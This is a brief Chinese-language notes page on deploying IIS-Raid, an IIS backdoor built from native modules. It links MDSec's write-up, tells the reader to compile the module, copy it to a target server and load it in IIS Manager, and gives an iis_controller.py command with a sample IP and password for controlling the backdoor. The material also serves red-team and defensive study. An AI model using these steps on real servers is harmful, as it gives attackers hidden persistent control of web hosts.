【IIS】IIS-Raid 后门模块使用

文章目录

1. 1. IIS Raid 编译及使用
2. 2. 发起请求

概述：IIS 后门 IIS-Raid 模块相关内容

Github：IIS Raid – Backdooring IIS Using Native Modules - MDSec

Docs: https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/

IIS Raid 编译及使用

Clone 到本地后编译 X64 Release 版本，将产物拷贝到目标机器，然后在 IIS-Manager GUI 界面导入模块。

发起请求

# python iis_controller.py --url http://{IP}:{Port}/ --password "密码"
python iis_controller.py --url http://192.168.19.137:8080/ --password Admin@Qwe1